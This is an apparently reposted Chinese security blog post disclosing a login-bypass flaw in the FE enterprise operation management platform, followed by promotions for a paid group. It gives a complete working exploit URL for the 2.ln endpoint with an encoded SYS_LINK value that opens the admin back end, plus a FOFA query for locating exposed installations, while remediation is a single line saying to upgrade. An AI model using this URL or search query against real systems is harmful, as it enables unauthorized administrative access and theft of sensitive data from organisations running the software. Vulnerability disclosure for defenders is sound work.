飞企互联-FE企业运营管理平台 登录绕过
2023-12-28 09:12:14 Author: 棉花糖网络安全圈(查看原文) 阅读量:32 收藏

最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:

给公众号设为星标

点我加入交流群获得第一时间更新通知
防失联+棉花糖私人公众号

棉花糖博客地址

www.mhtsec.com

漏洞详情

01

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。
飞企互联-FE企业运营管理平台 2.ln接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。

漏洞复现

02

直接访问url

即可登录后台

http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056

fofa语法

03

app="飞企互联-FE企业运营管理平台"

修复建议

04

升级至安全版本

打个广告

人太懒

放在这里一大篇也让大家心烦

有兴趣自己点开看吧👇

付费群介绍

END

那么又到了文末我们应该?

1、关注!点赞!转发!

2、点我查看付费群介绍!

3、封面获取请后台回复:20231228封面


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247500738&idx=1&sn=e3ceb8aa51ca27d60488662c77bcd81b&chksm=c1f24025cc7797646bcf723b344b0f44b9075647859a8abfd6657ff76237656f1a0caba45a97&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh